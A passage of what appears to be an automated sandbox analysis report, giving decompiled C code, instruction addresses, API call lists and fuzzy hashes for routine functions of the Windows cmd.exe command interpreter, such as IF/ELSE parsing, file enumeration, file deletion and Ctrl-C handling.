																	 *(_t166 + 8) = _t93;
																	__eflags = _t93 - _t175;
																	if(_t93 == _t175) {
																		E011E274C(0x1213d00, 0x104, L"%d",  *_t166);
																		_push(0x1213d00);
																		_push(1);
																		_push(0x2344);
																		L75:
																		E011DC5A2(_t136);
																		 *(_t166 + 8) = _t104;
																		E011DD937();
																		goto L52;
																	} else {
																		E011DDB92( *_t166);
																		L41:
																		_t125 =  *(_t166 + 4);
																		__eflags =  *_t125 - 0x26;
																		if( *_t125 == 0x26) {
																			 *((short*)(_t125 + 4)) = 0;
																			_t149 =  *_t166;
																			_t127 = (( *(_t166 + 4))[1] & 0x0000ffff) - 0x30;
																			_t81 = E011DDBFC((( *(_t166 + 4))[1] & 0x0000ffff) - 0x30,  *_t166);
																			__eflags = _t81 - _t175;
																			if(_t81 != _t175) {
																				goto L48;
																			} else {
																				goto L76;
																			}
																		} else {
																			__eflags =  *((short*)(_t166 + 0x10)) - 0x3c;
																			_push(_t125);
																			if( *((short*)(_t166 + 0x10)) == 0x3c) {
																				_t149 = 0x8000;
																				_t85 = E011DD120(_t125, 0x8000);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 != _t175) {
																					goto L45;
																				} else {
																					_t90 = E011E3320(L"DPATH");
																					__eflags = _t90;
																					if(_t90 == 0) {
																						goto L77;
																					} else {
																						_t132 =  *(_t180 - 0x18);
																						__eflags = _t132;
																						if(_t132 == 0) {
																							_t132 = _t180 - 0x220;
																						}
																						_t91 = SearchPathW(_t90,  *(_t166 + 4), _t104,  *(_t180 - 0x10), _t132, _t104);
																						__eflags = _t91;
																						if(_t91 == 0) {
																							goto L77;
																						} else {
																							_t125 =  *(_t180 - 0x18);
																							__eflags = _t125;
																							if(_t125 == 0) {
																								_t125 = _t180 - 0x220;
																							}
																							_push(_t125);
																							_t149 = 0x8000;
																							goto L44;
																						}
																					}
																				}
																			} else {
																				asm("sbb edx, edx");
																				_t149 = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				__eflags = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				L44:
																				_t85 = E011DD120(_t125, _t149);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 == _t175) {
																					L77:
																					E011DD937();
																					E011F985A( *0x1213cf0);
																					goto L52;
																				} else {
																					L45:
																					__eflags = _t85 -  *_t166;
																					if(_t85 !=  *_t166) {
																						_t149 =  *_t166;
																						_t86 = E011DDBFC(_t85,  *_t166);
																						_t127 =  *(_t180 - 0x224);
																						_t177 = _t86;
																						E011DDB92( *(_t180 - 0x224));
																						__eflags = _t177 - 0xffffffff;
																						if(_t177 == 0xffffffff) {
																							L76:
																							E011DD937();
																							E011E274C(0x1213d00, 0x104, L"%d",  *_t166);
																							E011DC5A2(_t127, 0x2344, 1, 0x1213d00);
																							goto L52;
																						} else {
																							_t85 =  *_t166;
																							_t175 = _t177 | 0xffffffff;
																							goto L46;
																						}
																					} else {
																						L46:
																						__eflags = _t85 - _t175;
																						if(_t85 == _t175) {
																							goto L77;
																						} else {
																							 *( *(_t180 - 0x228) + 4) = _t85;
																							goto L48;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													goto L49;
													L48:
													_t76 =  *(_t166 + 0x14);
													_t166 = _t76;
													__eflags = _t76;
												} while (_t76 != 0);
											}
										}
									}
									L49:
									__imp__??_V@YAXPAX@Z( *(_t180 - 0x18));
									_pop(_t167);
									_pop(_t174);
									__eflags =  *(_t180 - 4) ^ _t180;
									_pop(_t105);
									return E011E6FD0(_t104, _t105,  *(_t180 - 4) ^ _t180, _t149, _t167, _t174);
									goto L78;
								}
							} else {
								 *(_t171 + 0x44) = _t68;
								E011E1040(_t68,  *0x120fa8c, 0x120faa0);
								_t144 = 0x2c;
								_t100 = E011DDC74(_t104, _t144);
								 *(_t171 + 0x48) = _t100;
								__eflags = _t100;
								if(_t100 == 0) {
									E011F82EB(_t144);
								}
								goto L13;
							}
						} else {
							E011DF300(_t66, 0, 0, 0);
							goto L13;
						}
					}
				}
				L78:
			}



















































                                    0x011dd803
                                    0x011dd812
                                    0x011dd814
                                    0x011dd81c
                                    0x011dd81e
                                    0x011eb9cf
                                    0x011eb9d5
                                    0x011eb9d5
                                    0x011dd826
                                    0x011dd82c
                                    0x011dd830
                                    0x011eb9dd
                                    0x011eb9de
                                    0x011eb9e6
                                    0x011eb9e7
                                    0x011eb9ef
                                    0x011dd836
                                    0x011dd838
                                    0x011dd838
                                    0x011dd83f
                                    0x011dd840
                                    0x011dd847
                                    0x011eb9fa
                                    0x011eb9fe
                                    0x00000000
                                    0x011dd84d
                                    0x011dd84d
                                    0x011dd855
                                    0x011dd871
                                    0x011dd873
                                    0x011dd877
                                    0x011dd857
                                    0x011dd861
                                    0x011dd86b
                                    0x011dd91b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011dd86b
                                    0x011dd87e
                                    0x011dd883
                                    0x011dd888
                                    0x011dd921
                                    0x011dd924
                                    0x011dd932
                                    0x011dd932
                                    0x011dd926
                                    0x011dd926
                                    0x011dd894
                                    0x011dd895
                                    0x011dd89a
                                    0x011dd89f
                                    0x011eba09
                                    0x011eba09
                                    0x011dd8ac
                                    0x011dd8d7
                                    0x011dd8dc
                                    0x011dd8ae
                                    0x011dd8b0
                                    0x011dd8c0
                                    0x011dd8ca
                                    0x011dd8e2
                                    0x011dd8e5
                                    0x011dd8ea
                                    0x011dd8ec
                                    0x011eba13
                                    0x011eba1f
                                    0x011eba25
                                    0x011eba26
                                    0x011eba26
                                    0x011eba28
                                    0x011dda46
                                    0x011dda46
                                    0x011dda49
                                    0x011dda4b
                                    0x011dda4d
                                    0x00000000
                                    0x00000000
                                    0x011dd9f1
                                    0x011dd9f4
                                    0x011dd9f6
                                    0x011dd9f9
                                    0x011dd9f9
                                    0x011dd9fc
                                    0x011dd9ff
                                    0x011dd9ff
                                    0x011dda08
                                    0x011dda10
                                    0x011dda14
                                    0x011dda19
                                    0x011dda1c
                                    0x011dda1e
                                    0x011dda21
                                    0x011dda23
                                    0x011dda26
                                    0x011dda26
                                    0x011dda29
                                    0x011dda2c
                                    0x011dda2c
                                    0x011dda35
                                    0x011dda36
                                    0x011dda39
                                    0x011dda3b
                                    0x011dda40
                                    0x00000000
                                    0x00000000
                                    0x011dda40
                                    0x011dda39
                                    0x011dda1c
                                    0x011dda4f
                                    0x011dda55
                                    0x011dda5b
                                    0x011dda5e
                                    0x011eba31
                                    0x011eba36
                                    0x00000000
                                    0x011dda64
                                    0x011dda66
                                    0x011dda67
                                    0x011dda6c
                                    0x011dda72
                                    0x011dda74
                                    0x011ddb8d
                                    0x011ddb8f
                                    0x011dda7a
                                    0x011dda80
                                    0x011dda83
                                    0x011dda88
                                    0x011dda8b
                                    0x011dda8d
                                    0x011dda8d
                                    0x011dda90
                                    0x011dda92
                                    0x011dda98
                                    0x011dda98
                                    0x011dda9b
                                    0x011dda9b
                                    0x011dda9e
                                    0x00000000
                                    0x011ddaa4
                                    0x011ddaa6
                                    0x011ddaad
                                    0x011ddaaf
                                    0x011eba90
                                    0x011eba90
                                    0x00000000
                                    0x011ddab5
                                    0x011ddab7
                                    0x011ddabe
                                    0x011ddac1
                                    0x00000000
                                    0x011ddac7
                                    0x011ddac9
                                    0x011ddace
                                    0x011ddad0
                                    0x011eba43
                                    0x011eba48
                                    0x011eba4a
                                    0x00000000
                                    0x011eba50
                                    0x011eba56
                                    0x011eba5c
                                    0x011eba5e
                                    0x011eba64
                                    0x011eba66
                                    0x00000000
                                    0x011eba6c
                                    0x011eba7e
                                    0x011eba83
                                    0x011eba84
                                    0x011eba86
                                    0x00000000
                                    0x011eba86
                                    0x011eba66
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad6
                                    0x011ddad8
                                    0x011ddadd
                                    0x011ddae0
                                    0x011ddae2
                                    0x011ebb36
                                    0x011ebb3b
                                    0x011ebb3c
                                    0x011ebb3e
                                    0x011ebb43
                                    0x011ebb43
                                    0x011ebb4b
                                    0x011ebb4e
                                    0x00000000
                                    0x011ddae8
                                    0x011ddaea
                                    0x011ddaef
                                    0x011ddaef
                                    0x011ddaf2
                                    0x011ddaf6
                                    0x011ddb6f
                                    0x011ddb76
                                    0x011ddb7c
                                    0x011ddb7f
                                    0x011ddb84
                                    0x011ddb86
                                    0x00000000
                                    0x011ddb88
                                    0x00000000
                                    0x011ddb88
                                    0x011ddaf8
                                    0x011ddaf8
                                    0x011ddafd
                                    0x011ddafe
                                    0x011eba98
                                    0x011eba9d
                                    0x011ebaa2
                                    0x011ebaa8
                                    0x011ebaaa
                                    0x00000000
                                    0x011ebab0
                                    0x011ebab5
                                    0x011ebaba
                                    0x011ebabc
                                    0x00000000
                                    0x011ebac2
                                    0x011ebac2
                                    0x011ebac5
                                    0x011ebac7
                                    0x011ebac9
                                    0x011ebac9
                                    0x011ebad9
                                    0x011ebadf
                                    0x011ebae1
                                    0x00000000
                                    0x011ebae7
                                    0x011ebae7
                                    0x011ebaea
                                    0x011ebaec
                                    0x011ebaee
                                    0x011ebaee
                                    0x011ebaf4
                                    0x011ebaf5
                                    0x00000000
                                    0x011ebaf5
                                    0x011ebae1
                                    0x011ebabc
                                    0x011ddb04
                                    0x011ddb09
                                    0x011ddb11
                                    0x011ddb11
                                    0x011ddb17
                                    0x011ddb17
                                    0x011ddb1c
                                    0x011ddb22
                                    0x011ddb24
                                    0x011ebb89
                                    0x011ebb89
                                    0x011ebb94
                                    0x00000000
                                    0x011ddb2a
                                    0x011ddb2a
                                    0x011ddb2a
                                    0x011ddb2c
                                    0x011ebaff
                                    0x011ebb03
                                    0x011ebb08
                                    0x011ebb0e
                                    0x011ebb10
                                    0x011ebb15
                                    0x011ebb18
                                    0x011ebb58
                                    0x011ebb58
                                    0x011ebb6f
                                    0x011ebb7c
                                    0x00000000
                                    0x011ebb1a
                                    0x011ebb1a
                                    0x011ebb1c
                                    0x00000000
                                    0x011ebb1c
                                    0x011ddb32
                                    0x011ddb32
                                    0x011ddb32
                                    0x011ddb34
                                    0x00000000
                                    0x011ddb3a
                                    0x011ddb40
                                    0x00000000
                                    0x011ddb40
                                    0x011ddb34
                                    0x011ddb2c
                                    0x011ddb24
                                    0x011ddafe
                                    0x011ddaf6
                                    0x011ddae2
                                    0x011ddad0
                                    0x011ddac1
                                    0x011ddaaf
                                    0x00000000
                                    0x011ddb43
                                    0x011ddb43
                                    0x011ddb46
                                    0x011ddb48
                                    0x011ddb48
                                    0x011dda9b
                                    0x011dda92
                                    0x011dda74
                                    0x011ddb50
                                    0x011ddb53
                                    0x011ddb5f
                                    0x011ddb60
                                    0x011ddb61
                                    0x011ddb63
                                    0x011ddb6c
                                    0x00000000
                                    0x011ddb6c
                                    0x011dd8f2
                                    0x011dd8fb
                                    0x011dd8fe
                                    0x011dd905
                                    0x011dd906
                                    0x011dd90b
                                    0x011dd90e
                                    0x011dd910
                                    0x011dd912
                                    0x011dd912
                                    0x00000000
                                    0x011dd910
                                    0x011dd8cc
                                    0x011dd8d2
                                    0x00000000
                                    0x011dd8d2
                                    0x011dd8ca
                                    0x011dd8ac
                                    0x00000000

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: ELSE$IF/?
                                    • API String ID: 2081463915-1134991328
                                    • Opcode ID: 68a0f3e7eae79cc145230987cefb0f45493876cc411bb7c70aa7adaa811b6650
                                    • Instruction ID: 01e8e261cb7174a619d56f4466216fa1e6c1f387d95cdb2cf1748a6716eb0334
                                    • Opcode Fuzzy Hash: 68a0f3e7eae79cc145230987cefb0f45493876cc411bb7c70aa7adaa811b6650
                                    • Instruction Fuzzy Hash: 7C61E1316006029BEF3EDBB9B859A2ABBE1AF94224B14452ED506D72D0EF71D881C740
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E68BA, Relevance: 15.1, APIs: 10, Instructions: 114memoryfileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 54%
                                    			E011E68BA(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16) {
				signed int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t22;
				void* _t24;
				int _t28;
				void* _t40;
				void* _t41;
				void* _t47;
				void* _t50;
				void* _t51;
				void** _t53;
				void* _t54;
				signed int _t55;

				_t48 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t18 ^ _t55;
				_v12 = __ecx;
				_t40 = 0;
				_t22 = FindFirstFileExW(__edx, 0 | _a8 == 0x00000000, _a12, 0, 0, 2);
				_t53 = _a16;
				_t50 = _t22;
				 *_t53 = _t50;
				while(_t50 != 0xffffffff) {
					_push(_a4);
					_push(_a12);
					if(_v12 != E011E6A00) {
						 *0x12194b4();
						_t28 =  *_v12();
						_t50 =  *_t53;
					} else {
						_t28 = E011E6A00();
					}
					if(_t28 == 0) {
						if(FindNextFileW(_t50, _a12) == 0) {
							FindClose( *_t53);
							 *_t53 =  *_t53 | 0xffffffff;
							_t50 = _t50 | 0xffffffff;
							goto L6;
						} else {
							_t50 =  *_t53;
							continue;
						}
					} else {
						 *0x1213cf0 =  *0x1213cf0 & 0x00000000;
						_t40 = 1;
						L6:
						if(_t50 == 0xffffffff) {
							L12:
							if(_t40 == 0) {
								break;
							}
							L13:
							_t24 = _t40;
						} else {
							_t47 =  *0x1213cf4;
							if(_t47 == 0) {
								_t47 = HeapAlloc(GetProcessHeap(), 0, 0x14);
								goto L17;
							} else {
								_t48 =  *0x11fd5dc; // 0x0
								if(_t48 >=  *0x1213cf8) {
									_t47 = HeapReAlloc(GetProcessHeap(), 0, _t47, 4 + _t48 * 4);
									if(_t47 == 0) {
										 *0x1213cf0 = GetLastError();
										FindClose( *_t53);
										 *_t53 =  *_t53 | 0xffffffff;
										_t24 = 0;
									} else {
										 *0x1213cf8 =  *0x1213cf8 + 1;
										L17:
										_t48 =  *0x11fd5dc; // 0x0
										 *0x1213cf4 = _t47;
										goto L9;
									}
								} else {
									L9:
									if(_t47 != 0) {
										 *(_t47 + _t48 * 4) =  *_t53;
										 *0x11fd5dc = _t48;
									}
									_t40 = 1;
									goto L12;
								}
							}
						}
					}
					_pop(_t51);
					_pop(_t54);
					_pop(_t41);
					return E011E6FD0(_t24, _t41, _v8 ^ _t55, _t48, _t51, _t54);
				}
				 *0x1213cf0 = GetLastError();
				goto L13;
			}




















                                    0x011e68ba
                                    0x011e68bf
                                    0x011e68c0
                                    0x011e68c1
                                    0x011e68c8
                                    0x011e68d4
                                    0x011e68dc
                                    0x011e68e6
                                    0x011e68ec
                                    0x011e68ef
                                    0x011e68f1
                                    0x011e68f3
                                    0x011e68f8
                                    0x011e68fe
                                    0x011e6906
                                    0x011e699a
                                    0x011e69a3
                                    0x011e69a5
                                    0x011e690c
                                    0x011e690c
                                    0x011e690c
                                    0x011e6913
                                    0x011e69e2
                                    0x011e69ed
                                    0x011e69f3
                                    0x011e69f6
                                    0x00000000
                                    0x011e69e4
                                    0x011e69e4
                                    0x00000000
                                    0x011e69e4
                                    0x011e6919
                                    0x011e6919
                                    0x011e6920
                                    0x011e6922
                                    0x011e6925
                                    0x011e6951
                                    0x011e6953
                                    0x00000000
                                    0x00000000
                                    0x011e6955
                                    0x011e6955
                                    0x011e6927
                                    0x011e6927
                                    0x011e692f
                                    0x011e6988
                                    0x00000000
                                    0x011e6931
                                    0x011e6931
                                    0x011e693d
                                    0x011e69c4
                                    0x011e69c8
                                    0x011f154f
                                    0x011f1554
                                    0x011f155a
                                    0x011f155d
                                    0x011e69ce
                                    0x011e69ce
                                    0x011e698a
                                    0x011e698a
                                    0x011e6990
                                    0x00000000
                                    0x011e6990
                                    0x011e693f
                                    0x011e693f
                                    0x011e6941
                                    0x011e6945
                                    0x011e6949
                                    0x011e6949
                                    0x011e694f
                                    0x00000000
                                    0x011e694f
                                    0x011e693d
                                    0x011e692f
                                    0x011e6925
                                    0x011e695a
                                    0x011e695b
                                    0x011e695e
                                    0x011e6967
                                    0x011e6967
                                    0x011e6970
                                    0x00000000

                                    APIs
                                    • FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,011DAE4F,00000037,00000000,?,?), ref: 011E696A
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,011DAE4F,00000037,00000000,?,?), ref: 011E697B
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E6982
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69B7
                                    • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DAE4F,00000037,00000000,?,?), ref: 011E69BE
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,011DAE4F,00000037,00000000,?,?), ref: 011E69DA
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(011DAE4F,?,011DAE4F,00000037,00000000,?,?), ref: 011E69ED
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
                                    • String ID:
                                    • API String ID: 1047556133-0
                                    • Opcode ID: bd5055c26d6986c4d7791438e641f8d8d6467a4814b4cdb1aa0cb1cfe8dd3354
                                    • Instruction ID: 715a1d092b3117166d7c9ed6ac7227bf96f2bc474ed480485811791da40d26ed
                                    • Opcode Fuzzy Hash: bd5055c26d6986c4d7791438e641f8d8d6467a4814b4cdb1aa0cb1cfe8dd3354
                                    • Instruction Fuzzy Hash: 8541B270600601AFDF28CFA9E81DAA97BF9FB65325F51462CE992C7294EF309841CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D83F2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82filenativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E011D83F2(WCHAR* __ecx, signed int __edx) {
				void* _v8;
				void* _v16;
				void* _v24;
				long _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _v64;
				struct _EXCEPTION_RECORD _t30;
				long _t31;
				long _t35;
				WCHAR* _t41;
				char* _t43;
				long _t47;
				void* _t49;

				_t47 = 0;
				_t41 = __ecx;
				if((__edx & 0x00000400) != 0) {
					L11:
					if(DeleteFileW(_t41) == 0) {
						_t47 = GetLastError();
					}
					L8:
					return _t47;
				}
				_v8 = _v8 | 0xffffffff;
				_t30 =  &_v16;
				__imp__RtlDosPathNameToRelativeNtPathName_U_WithStatus(__ecx, _t30, 0,  &_v40);
				if(_t30 < 0) {
					goto L11;
				}
				if(_v40 > 0) {
					_t31 = _v32;
					_t43 =  &_v40;
				} else {
					_t31 = 0;
					_t43 =  &_v16;
					_v32 = 0;
				}
				_v60 = _t31;
				_v64 = 0x18;
				_v52 = 0x40;
				_v56 = _t43;
				_v48 = _t47;
				_v44 = _t47;
				_t35 = NtOpenFile( &_v8, 0x10000,  &_v64,  &_v24, 4, 0x5040);
				__imp__RtlReleaseRelativeName( &_v40);
				RtlFreeUnicodeString( &_v16);
				if(_t35 < 0) {
					goto L11;
				} else {
					if(E011D84BE(_v8) != 0) {
						_t49 = E011F9AB4(_v8);
					} else {
						_t49 = 1;
					}
					CloseHandle(_v8);
					if(_t49 == 0) {
						goto L11;
					} else {
						goto L8;
					}
				}
			}





















                                    0x011d83fd
                                    0x011d83ff
                                    0x011d8407
                                    0x011f036d
                                    0x011f0376
                                    0x011f0382
                                    0x011f0382
                                    0x011d84b5
                                    0x011d84bd
                                    0x011d84bd
                                    0x011d840d
                                    0x011d8416
                                    0x011d841b
                                    0x011d8423
                                    0x00000000
                                    0x00000000
                                    0x011d842d
                                    0x011f0353
                                    0x011f0356
                                    0x011d8433
                                    0x011d8433
                                    0x011d8435
                                    0x011d8438
                                    0x011d8438
                                    0x011d8440
                                    0x011d844c
                                    0x011d845c
                                    0x011d8464
                                    0x011d8467
                                    0x011d846a
                                    0x011d846d
                                    0x011d8479
                                    0x011d8483
                                    0x011d848b
                                    0x00000000
                                    0x011d8491
                                    0x011d849b
                                    0x011f0366
                                    0x011d84a1
                                    0x011d84a3
                                    0x011d84a3
                                    0x011d84a7
                                    0x011d84af
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d84af

                                    APIs
                                    • RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 011D841B
                                    • NtOpenFile.NTDLL(000000FF,00010000,?,?,00000004,00005040), ref: 011D846D
                                    • RtlReleaseRelativeName.NTDLL(?), ref: 011D8479
                                    • RtlFreeUnicodeString.NTDLL(?), ref: 011D8483
                                      • Part of subcall function 011D84BE: NtQueryVolumeInformationFile.NTDLL(000000FF,?,?,00000008,00000004), ref: 011D84EA
                                    • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(000000FF), ref: 011D84A7
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000001), ref: 011F036E
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,011D8393), ref: 011F037C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: File$NamePathRelative$CloseDeleteErrorFreeHandleInformationLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                    • String ID: @
                                    • API String ID: 2968197161-2766056989
                                    • Opcode ID: 15b906fcc33d32b35945597303889ee1e0c275476096b7cf534ee7bb332ef71e
                                    • Instruction ID: 68ca3638a004b323041b77d24e8829d245a3f3a9f4afba082227942518c7f86b
                                    • Opcode Fuzzy Hash: 15b906fcc33d32b35945597303889ee1e0c275476096b7cf534ee7bb332ef71e
                                    • Instruction Fuzzy Hash: 1E2162B1D00209AFDF24DFA5E948AEFBBBDEB58654F114169FA11E3241DB309E04CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F6D90, Relevance: 13.6, APIs: 9, Instructions: 67filenativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 31%
                                    			E011F6D90(void* __edi, intOrPtr _a4) {
				char _v12;
				void* __ecx;
				int _t4;
				void* _t6;
				void* _t7;
				struct _IO_FILE* _t10;
				void* _t13;
				void* _t16;

				_t16 = __edi;
				_push(_t13);
				_push(_t13);
				if(_a4 == 0 || _a4 == 1) {
					EnterCriticalSection( *0x1203858);
					 *0x11fd544 = 1;
					LeaveCriticalSection( *0x1203858);
					if( *0x11fd0db != 0 &&  *0x1213cc4 != 0) {
						_push("^C");
						_t10 = E011E7721(_t4, 2);
						_pop(_t13);
						_t4 = fflush(E011E7721(fprintf(_t10, ??), 2));
					}
					if( *0x120b938 != 0xffffffff) {
						__imp__TryAcquireSRWLockExclusive(0x1217f20, _t16);
						if(_t4 != 0) {
							__imp__NtCancelSynchronousIoFile( *0x120b938, 0,  &_v12);
							__imp__ReleaseSRWLockExclusive(0x1217f20);
						}
					}
					if(E011E7797(_t13) == 0) {
						_t7 = E011E0178(_t5);
						if(_t7 != 0) {
							__imp___get_osfhandle(0);
							FlushConsoleInputBuffer(_t7);
						}
					}
					_t6 = 1;
				} else {
					_t6 = 0;
				}
				return _t6;
			}











                                    0x011f6d90
                                    0x011f6d95
                                    0x011f6d96
                                    0x011f6d9f
                                    0x011f6db3
                                    0x011f6dbf
                                    0x011f6dc5
                                    0x011f6dd2
                                    0x011f6ddd
                                    0x011f6de4
                                    0x011f6de9
                                    0x011f6df9
                                    0x011f6dff
                                    0x011f6e09
                                    0x011f6e12
                                    0x011f6e1a
                                    0x011f6e28
                                    0x011f6e2f
                                    0x011f6e2f
                                    0x011f6e35
                                    0x011f6e3d
                                    0x011f6e41
                                    0x011f6e48
                                    0x011f6e4c
                                    0x011f6e54
                                    0x011f6e54
                                    0x011f6e48
                                    0x011f6e5a
                                    0x011f6da6
                                    0x011f6da6
                                    0x011f6da6
                                    0x011f6e60

                                    APIs
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DB3
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 011F6DC5
                                    • fprintf.MSVCRT ref: 011F6DEB
                                    • fflush.MSVCRT ref: 011F6DF9
                                    • TryAcquireSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E12
                                    • NtCancelSynchronousIoFile.NTDLL(00000000,00000000), ref: 011F6E28
                                    • ReleaseSRWLockExclusive.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20), ref: 011F6E2F
                                    • _get_osfhandle.MSVCRT ref: 011F6E4C
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 011F6E54
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CriticalExclusiveLockSection$AcquireBufferCancelConsoleEnterFileFlushInputLeaveReleaseSynchronous_get_osfhandlefflushfprintf
                                    • String ID:
                                    • API String ID: 3139166086-0
                                    • Opcode ID: 8b21a91cf073ce9918c0a9012cb838c880f2aa71c4b275b82131f258d6e2289a
                                    • Instruction ID: 0d3a2d669b8a8a62280d232c0a5f64d16cf12eef3b7968ab26f4f3de8064f518
                                    • Opcode Fuzzy Hash: 8b21a91cf073ce9918c0a9012cb838c880f2aa71c4b275b82131f258d6e2289a
                                    • Instruction Fuzzy Hash: F211B132A40210AFEF39EFA8F85DBAA7F68EB64B19F04011DF605911D6CB7144C1C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E5FC8, Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 372COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 92%
                                    			E011E5FC8(void* __ecx, void* __edx, intOrPtr _a4, signed int _a8, WCHAR* _a12, signed int _a16, intOrPtr* _a20, intOrPtr* _a24) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				int _v556;
				intOrPtr* _v560;
				WCHAR* _v564;
				intOrPtr* _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t84;
				short _t95;
				short _t97;
				void* _t98;
				intOrPtr _t100;
				signed int _t112;
				signed int _t113;
				long _t118;
				signed int _t120;
				void* _t121;
				short _t122;
				signed char _t124;
				void* _t125;
				long _t126;
				void* _t127;
				short _t128;
				long _t136;
				signed short* _t137;
				short _t146;
				short _t147;
				void* _t148;
				signed int _t150;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				short _t156;
				signed int _t161;
				WCHAR* _t162;
				intOrPtr* _t163;
				short* _t169;
				long _t170;
				short* _t171;
				signed int _t177;
				short _t178;
				WCHAR* _t182;
				WCHAR* _t183;
				signed int _t187;
				WCHAR* _t188;
				WCHAR* _t199;
				short* _t202;
				void* _t205;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				long _t219;
				signed int _t220;
				void* _t222;
				void* _t223;
				short _t227;
				void* _t228;
				WCHAR* _t229;
				void* _t232;
				WCHAR* _t233;
				signed int _t235;
				intOrPtr* _t239;
				short* _t241;
				void* _t242;
				WCHAR* _t244;
				signed int _t246;
				short* _t248;
				WCHAR* _t250;
				signed int _t251;
				signed int _t252;
				WCHAR* _t254;
				void* _t258;
				intOrPtr _t259;
				signed int _t260;

				_t84 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t84 ^ _t260;
				_v552 = _a4;
				_v564 = _a12;
				_v560 = _a20;
				_t232 = __edx;
				_v568 = _a24;
